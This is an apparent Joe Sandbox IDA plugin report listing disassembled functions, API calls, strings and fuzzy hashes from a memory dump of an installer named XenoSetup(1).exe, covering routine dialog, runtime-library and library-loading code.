Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: 47099e09ad5c60f1286a9311b266c4b701d149c04036b96aa5eca0f2dc0c2626
Instruction ID: df37bae3ad9e92201f8eb4c31317a0e5cabe9f9922c9686c77a0723560343787
Opcode Fuzzy Hash: 47099e09ad5c60f1286a9311b266c4b701d149c04036b96aa5eca0f2dc0c2626
Instruction Fuzzy Hash: B0016677900119A7C72277348D89A7F7AB9AFC0762F180011FF00E73A5DF7A8C056661

Function 00FFD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00FE1316: GetDlgItem.USER32(00000000,00003021), ref: 00FE135A
Part of subcall function 00FE1316: SetWindowTextW.USER32(00000000,010135F4), ref: 00FE1370

EndDialog.USER32(?,00000001), ref: 00FFD64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00FFD661
SetDlgItemTextW.USER32(?,00000066,?), ref: 00FFD675
SetDlgItemTextW.USER32(?,00000068), ref: 00FFD684

Strings

RENAMEDLG, xrefs: 00FFD618

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: c1c04d493b50036a393afa1163415d63b60cb3daab5516f651a3515b1bbd7c5e
Instruction ID: e9cc4c1bf382d24149e7ceda0dab8abc59832620a102d073fed7041bdf7a09d9
Opcode Fuzzy Hash: c1c04d493b50036a393afa1163415d63b60cb3daab5516f651a3515b1bbd7c5e
Instruction Fuzzy Hash: F4012D336852187BD2214F649E49F77775EFF5AB11F110101F385E6098C6A79804A779

Function 01007E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01007E24,00000000,?,01007DC4,00000000,0101C300,0000000C,01007F1B,00000000,00000002), ref: 01007E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01007EA6
FreeLibrary.KERNEL32(00000000,?,?,?,01007E24,00000000,?,01007DC4,00000000,0101C300,0000000C,01007F1B,00000000,00000002), ref: 01007EC9

Strings

mscoree.dll, xrefs: 01007E8C
CorExitProcess, xrefs: 01007E9E

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3d42506672de637d645e9cd0b93dc3ab77de81d3329e239ccf52660ef71cf265
Instruction ID: 81687018c71e0c06a2226c4a84f8ce705bf31ab3ed6c1b2236a95d5405187e7d
Opcode Fuzzy Hash: 3d42506672de637d645e9cd0b93dc3ab77de81d3329e239ccf52660ef71cf265
Instruction Fuzzy Hash: B3F0C831A01208BBEB229FA4DC09B9EBFF5FF44711F0040A9F985A6154CB7E9D40CB90

Function 00FEF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FF0836
Part of subcall function 00FF081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FEF2D8,Crypt32.dll,00000000,00FEF35C,?,?,00FEF33E,?,?,?), ref: 00FF0858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FEF2E4
GetProcAddress.KERNEL32(010281C8,CryptUnprotectMemory), ref: 00FEF2F4

Strings

CryptUnprotectMemory, xrefs: 00FEF2EA
Crypt32.dll, xrefs: 00FEF2CE
CryptProtectMemory, xrefs: 00FEF2DE

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 2bb8bc571f4738933ef6e428d0f013cbc64b747abc0de2aaa2cc766a77c0cdfc
Instruction ID: 1858cf7f4b0a64e28a93cba5d41377d0a891bec7b28d561d09207097f41c5e9f
Opcode Fuzzy Hash: 2bb8bc571f4738933ef6e428d0f013cbc64b747abc0de2aaa2cc766a77c0cdfc
Instruction Fuzzy Hash: 69E04F72D507419EC7319F369849B017AD47F04734B14882DF0DAAB605DABDD440CB50

Function 01002BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 01002CA1
___AdjustPointer.LIBCMT ref: 01002CC4
_abort.LIBCMT ref: 01002D12
___AdjustPointer.LIBCMT ref: 01002D60

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: e08c9d9616fd1833a3fc38f71dfacc1884a3ed30847df8213a94fce6f9361f74
Instruction ID: 6ca3e72c975f2570ad700b0ed9f05ac95d1d0a62e6d2ba739a3b3f1f23e68c0c
Opcode Fuzzy Hash: e08c9d9616fd1833a3fc38f71dfacc1884a3ed30847df8213a94fce6f9361f74
Instruction Fuzzy Hash: 3051D271600216AFFB2B9F58D848BAA77A4FF14310F24416EED85472E1D732ED50C790

Function 0100BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0100BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0100BF5C

Part of subcall function 01008E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0100CA2C,00000000,?,01006CBE,?,00000008,?,010091E0,?,?,?), ref: 01008E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0100BF82
_free.LIBCMT ref: 0100BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0100BFA4

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 2b1dbe15b3ea2d459c2df896dbd533896f36020b33bc59143296e8b8e68b1904
Instruction ID: 6851dbb584f65db1baa25909c8b2a43fc8d9a3b7aa9fb97bcfec44e775ae5ab2
Opcode Fuzzy Hash: 2b1dbe15b3ea2d459c2df896dbd533896f36020b33bc59143296e8b8e68b1904
Instruction Fuzzy Hash: 3501D47A6012127F7722157A5C4CDBB7EBDEEC2AA0714016DFA88C7284EA668C0186B0

Function 01009869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,01021030,00000200,010091AD,0100617E,?,?,?,?,00FED984,?,?,?,00000004,00FED710,?), ref: 0100986E
_free.LIBCMT ref: 010098A3
_free.LIBCMT ref: 010098CA
SetLastError.KERNEL32(00000000,01013A34,00000050,01021030), ref: 010098D7
SetLastError.KERNEL32(00000000,01013A34,00000050,01021030), ref: 010098E0

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 9a2f2e4f2be404594726da2c452ae7c1875e2ed102c8a0e4694f3cafb13f2288
Instruction ID: dbe1c3a2719f6ab20bac0a4b071dc058d31cd836484b534220a33ada517a6a41
Opcode Fuzzy Hash: 9a2f2e4f2be404594726da2c452ae7c1875e2ed102c8a0e4694f3cafb13f2288
Instruction Fuzzy Hash: 4601FE35245602E7F22771386C8495F26A9EBD1678F110135F5DD963C3EE2989014321

Function 00FF0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00FF11CF: ResetEvent.KERNEL32(?), ref: 00FF11E1
Part of subcall function 00FF11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00FF11F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00FF0F21
CloseHandle.KERNEL32(?,?), ref: 00FF0F3B
DeleteCriticalSection.KERNEL32(?), ref: 00FF0F54
CloseHandle.KERNEL32(?), ref: 00FF0F60
CloseHandle.KERNEL32(?), ref: 00FF0F6C

Part of subcall function 00FF0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00FF1206,?), ref: 00FF0FEA
Part of subcall function 00FF0FE4: GetLastError.KERNEL32(?), ref: 00FF0FF6

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: b813a3028b2b55058f4e33c4b9ed1adcaa8f817cf48a6482b53a542a6de802b1
Instruction ID: 27a9dbdc77b652f7b364f311c4d6e085d36039f581460be59bdffc374e9c526e
Opcode Fuzzy Hash: b813a3028b2b55058f4e33c4b9ed1adcaa8f817cf48a6482b53a542a6de802b1
Instruction Fuzzy Hash: C3017172500744EFC7329B64D884BD6FBE9FF08720F000929F2AB961A5CB7A7A44DB50

Function 0100C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0100C817

Part of subcall function 01008DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34), ref: 01008DE2
Part of subcall function 01008DCC: GetLastError.KERNEL32(01013A34,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34,01013A34), ref: 01008DF4

_free.LIBCMT ref: 0100C829
_free.LIBCMT ref: 0100C83B
_free.LIBCMT ref: 0100C84D
_free.LIBCMT ref: 0100C85F

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6607152423336f63135b80aedbbe929a8fd4b9ad021690def581a17a3009183e
Instruction ID: baa69483eb44c2729facebc77b293f59314b2e3ef5437213892127c7501b2eeb
Opcode Fuzzy Hash: 6607152423336f63135b80aedbbe929a8fd4b9ad021690def581a17a3009183e
Instruction Fuzzy Hash: 05F06832910102ABF663EA6CE584C4A7BE9BB10720F54499BF6C8D7585C779F980C754

Function 00FF1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FF1FE5
_wcslen.LIBCMT ref: 00FF1FF6
_wcslen.LIBCMT ref: 00FF2006
_wcslen.LIBCMT ref: 00FF2014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00FEB371,?,?,00000000,?,?,?), ref: 00FF202F

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 2bfa958824575a2e86f86ca32715024d8b76a10ecd45e601ee56e49cd5189383
Instruction ID: 8f1fa76a6aad8571f853063cd43d7fd95f309ca256ce91a074857fc110d98bbb
Opcode Fuzzy Hash: 2bfa958824575a2e86f86ca32715024d8b76a10ecd45e601ee56e49cd5189383
Instruction Fuzzy Hash: A8F04433008058BEDF236F50AC08DCA3F26EF50760F218005FA5A5E0A0CB7299A1EA90

Function 01008900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0100891E

Part of subcall function 01008DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34), ref: 01008DE2
Part of subcall function 01008DCC: GetLastError.KERNEL32(01013A34,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34,01013A34), ref: 01008DF4

_free.LIBCMT ref: 01008930
_free.LIBCMT ref: 01008943
_free.LIBCMT ref: 01008954
_free.LIBCMT ref: 01008965

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 988f029fe6a05f639dc62c3a7cc4728922c2e06c4c76ee99837e2dd848bfc8f2
Instruction ID: f0d4722eaf2a487c27eb248c92aa5264f1ff4e2b92b23668d3d307929edcd898
Opcode Fuzzy Hash: 988f029fe6a05f639dc62c3a7cc4728922c2e06c4c76ee99837e2dd848bfc8f2
Instruction Fuzzy Hash: A4F03AB9E20123AB96677F18FA804493FE1F7287147044707F9D852299C73F4941DB81

Function 00FF15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00FF17BC
_swprintf.LIBCMT ref: 00FF186B

Strings

%s: %s, xrefs: 00FF17CB
%ls, xrefs: 00FF1641, 00FF1657

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: e9bbec8fb1b476513e9ae706cbfd1219e2f63602904b6ffc3f3574056225bfc9
Instruction ID: 8ab8e941399bb4b9bacb9f1892984611353545bbe342b201c7117df3e3a30e8b
Opcode Fuzzy Hash: e9bbec8fb1b476513e9ae706cbfd1219e2f63602904b6ffc3f3574056225bfc9
Instruction Fuzzy Hash: BD51873768830CF6E7212AA48E46F367665BF05F44F244507F39AA84F1D9A7A410FB1A

Function 01007F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe,00000104), ref: 01007FAE
_free.LIBCMT ref: 01008079
_free.LIBCMT ref: 01008083

Strings

C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe, xrefs: 01007FA5, 01007FAC, 01007FDB, 01008013

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
API String ID: 2506810119-2811273676
Opcode ID: 9db6d29bdecf2d327f9e5a875cdfafd83c36bd34c1d6cd3108d60526ee1bc9e6
Instruction ID: a8f28c56bbcd71cfd3464f57df5d58b733526e3eb2b82fb25b04850707828baf
Opcode Fuzzy Hash: 9db6d29bdecf2d327f9e5a875cdfafd83c36bd34c1d6cd3108d60526ee1bc9e6
Instruction Fuzzy Hash: E931A0B5E00209AFEB63DF99D88099EBBECFF94310F1080ABF58497280D6759A40CB51

Function 010031D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 010031FB
_abort.LIBCMT ref: 01003306

Strings

RCC, xrefs: 01003215
MOC, xrefs: 0100320D

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: de1ce95b22a71f237b655da219f8504cc7e408cbcfb2f3a46541af9a6a6af8cf
Instruction ID: 15cb5f5866c3b80b2bea6c4bf8cc8a90eda06ce803b226f24dd80e30bb6c17be
Opcode Fuzzy Hash: de1ce95b22a71f237b655da219f8504cc7e408cbcfb2f3a46541af9a6a6af8cf
Instruction Fuzzy Hash: 13416A71900209AFEF17DF98CC81AEEBBB5BF08304F198099FA446B291D735A950DB50

Function 00FE7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FE7406

Part of subcall function 00FE3BBA: __EH_prolog.LIBCMT ref: 00FE3BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00FE74CD

Part of subcall function 00FE7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FE7AAB
Part of subcall function 00FE7A9C: GetLastError.KERNEL32 ref: 00FE7AF1
Part of subcall function 00FE7A9C: CloseHandle.KERNEL32(?), ref: 00FE7B00

Strings

SeSecurityPrivilege, xrefs: 00FE744B
SeRestorePrivilege, xrefs: 00FE7460

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: dc44b74439d9404829cbe20175bcbb6436d8fd924be0834daa11c95e16506efa
Instruction ID: eacfcf9ed38c58a6057299815e0b7c67ec07b0b3c92a1d750071d13d05441b7d
Opcode Fuzzy Hash: dc44b74439d9404829cbe20175bcbb6436d8fd924be0834daa11c95e16506efa
Instruction Fuzzy Hash: BE31F471E00398AADF21EFA5DC45BEE7BB9BF44310F084015F845A7192C77C8A44E761

Function 00FFAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00FE1316: GetDlgItem.USER32(00000000,00003021), ref: 00FE135A
Part of subcall function 00FE1316: SetWindowTextW.USER32(00000000,010135F4), ref: 00FE1370

EndDialog.USER32(?,00000001), ref: 00FFAD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00FFADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00FFADC2

Strings

ASKNEXTVOL, xrefs: 00FFAD28

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
